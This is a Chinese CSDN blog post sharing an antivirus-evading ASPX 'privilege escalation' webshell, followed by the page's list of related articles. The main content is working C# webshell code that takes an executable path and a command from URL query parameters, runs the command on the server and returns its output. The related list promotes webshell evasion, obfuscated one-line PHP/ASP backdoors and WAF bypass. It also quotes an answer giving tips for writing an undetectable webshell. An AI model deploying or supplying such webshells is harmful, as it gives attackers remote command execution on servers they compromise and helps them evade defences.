shell 免杀aspx_发个免杀修改的aspx提权马qingshell.aspx

最新推荐文章于 2021-03-27 13:14:45 发布
最新推荐文章于 2021-03-27 13:14:45 发布
阅读量570 收藏 1
点赞数
文章标签: shell 免杀aspx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35795675/article/details/113540542
版权

protected void Page_load(object sender,EventArgs e)

{

string ok = Request.QueryString["sb"];

string shell= Request.QueryString["shell"];

//www.moonsec.com moon

Response.Write(shell + ok );

Response.Write("

");

Response.Write(GetCmd(ok,shell));

Response.Write("

");

}

private string GetCmd(string cmd,string shell)

{

string ok = string.Empty;

Process p = new Process();

p.StartInfo.FileName = shell;

p.StartInfo.UseShellExecute = false;

p.StartInfo.RedirectStandardInput = true;

p.StartInfo.RedirectStandardOutput = true;

p.StartInfo.RedirectStandardError = true;

p.StartInfo.CreateNoWindow = true;

string strOutput = null;

try

{

p.Start();

p.StandardInput.WriteLine(cmd);

Response.Write(cmd);

p.StandardInput.WriteLine("exit");

ok = p.StandardOutput.ReadToEnd();

p.WaitForExit();

p.Close();

}

catch (Exception ex)

{

Response.Write("

");

Response.Write(ex);

Response.Write("/

");

}

return ok;

}

鸣泣的海猫
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ASPX一句话shell客户端+ASPXshell MS08-067插件
12-28
ASPX一句话shell客户端+ASPXshell MS08-067插件
shell 免杀aspx_免杀webshell?无限生成工具蚁剑
weixin_36378347的博客
01-07 905
as_webshel??l_venomwebshel??l-venom蚁剑版(thx @SardineFish&@Medicean)原项目地址:https://github.com/yzddmr6/webshel??l-venom3.2更新日志鸽了这么久,我来更新啦更新免杀修复已知问题:宝塔在遇到header404时会解析到他的404模版上,而不是shell上,导致无法连接,故去除头部的...
shell 免杀aspx_绕过WebShell检测的总结之文件免杀
weixin_31124869的博客
12-31 516
WAF会维护一个规则库记录webshell常用的函数、方法、结构,当匹配上对应特征时便发出警告、直接封禁或隔离。但是安全厂商们为了提升用户体验,一般会以可用性为首要目标,其次才是安全性,这是一个硬伤也是绕过的基础由于正常业务功能的需要,WAF通常并不会全盘枪毙语言中可以执行代码的结构或函数(比如eval),而是判断敏感函数是否处于某种木后门常用且业务功能不常用的结构中,绕过即是找出既能达到目的又...
ASPX 1句话SHELL
收集盒 Book box
11-09 588
ISTO的版本     ASPX One Code     " enctype="multipart/form-data"> filename:          c# if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"])  ); }
shell 免杀aspx_Webshell免杀
weixin_39656513的博客
12-31 560
一句话木在渗透测试中最常用的就是一句话后门(小)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大。最常见的php一句话木这个一句话木由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。本着这个原则,尝试改写一句话木绕过WAF。搜集了几个常用的php函数执行代码的eval、assert、preg_replace接收数据的$_POST、$_GET、$...
shell.aspx
05-06
真的过安全狗,过D盾,提权还是得看脸,亲测可用,本程序只允许内部测试使用,请勿用作违法用途。请遵守国家法律法规,勿要以身试法。
ASPX打包整站SHELL.rar
05-08
看得懂的来,是打包整个为ZIP的打包页面 //压缩 protected void wDZ(object sender, EventArgs e) { try { ZipFile zip = new ZipFile(this.txtDest.Value ); zip.AddDirectory(txtSour.Value);...
ASPX一句话shell客户端
06-16
ASPX一句话shell客户端+ASPXshell MS08-067插件.rar
K8PackWebShellv1.0 ASPX整站打包工具[K8].rar
06-12
功能简介: 1 可选择.net自带zip类 或者 调用...2 不输入打包路径 默认将打包本Shell所在的当前目录 3 输出路径在Shell所在目录下生成k8webpack_当前时间(取到秒) 4 文件上传功能 主要是用来上传Winrar 文件打包的
shell 免杀aspx_对于asp免杀webshell的一些总结
weixin_31235909的博客
12-31 603
0x00 前言现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章偷偷介绍下公众号:404安全0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有:VBScriptASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//ASP的执行函数 :...
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
2016最新aspx免杀webshell过安全狗
03-05
上传压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
shell 免杀aspx_记一次aspx网站渗透
weixin_42128141的博客
12-29 1529
通过前期信息搜集获取到目标站的80xx端口发现一处源码泄露查看配置文件登录manage.aspx上传shell发现安装了TeamViewer看下进程如果运行tv的话,可直接读取其远程的账号密码https://github.com/uknowsec/SharpDecryptPwdSharpDecryptPwd对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,T...
shell 免杀aspx_发个免杀修改aspx提权
weixin_35559202的博客
12-31 380
htmlPUBLIC"-//W3C//DTDXHTML1.0Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">protectedvoidPage_load(objectsender,EventArgse){stringok=Request.QueryString["s...
aspxshell下突破无可写可执行目录执行cmd
weixin_34112208的博客
07-01 130
try { var strPath:String = "c:\\windows\\temp\\cmd.exe", strUser:String = "everyone"; var dirinfo:System.IO.DirectoryInfo = new System.IO.DirectoryInfo(strPath); var dirsecurity:System.Secur...
免杀过狗php一句话,2014最新免杀过安全狗一句话aspx,asp一句话,php一句话
weixin_36418921的博客
03-27 519
ASP系列(密码是-7)PHP系列@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/])...
shell 免杀aspx_避开eval关键字,打造免杀一句话木
weixin_30304773的博客
01-16 1906
这年头留个php一句话木,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木的寿命,但要怎么避开呢?首先我想到的是将eval从字符串类型赋给一个变量。如:$func = 'phpinfo';$func();这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我上又想到了assert函数,他有着类似eval的功能,但效果并不理想...
python 递增后循环_python在循环中任意递增迭代器
weixin_30039755的博客
12-23 515
Python中有一个很棒的包,名为^{}。但在我开始讨论之前,解释一下迭代协议是如何在Python中实现的会很有帮助。如果要在容器上提供迭代,可以指定提供iterator type的^{}类方法。"Understanding Python's 'for' statement"是一篇很好的文章,介绍了for-in语句在Python中的实际工作方式,并对迭代器类型的工作方式进行了很好的概述。请看以下内...
无限免杀D盾脚本之aspx ——yzddMr6
yzddMr6的博客
11-19 3457
前言 自己曾经写过一篇文章:利用随机异或无限免杀某盾 php的webshell免杀方法有很多,但是市面上很少有讲aspx免杀的文章. 因为aspx的权限一般较大,对于渗透过程中还是很重要的, 所以就想着写一篇文章来简单的介绍下aspx的免杀 0x01 主要方法 字符串拼接 函数 数组 Base64编码 0x02 了解aspx一句话 Aspx的一句话一般是使用Jscript语言实...
那么现在你遇到了一个aspx的文件上传,但是你上传的shell都被杀软杀掉了,你需要写一个免杀的webshell
最新发布
03-08
我可以为您提供一些关于如何编写免杀的webshell的建议。首先,您可以尝试使用一些加密技术来隐藏您的代码,例如使用base64编码或者AES加密。其次,您可以尝试使用...希望这些建议能够帮助您编写一个免杀的webshell

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值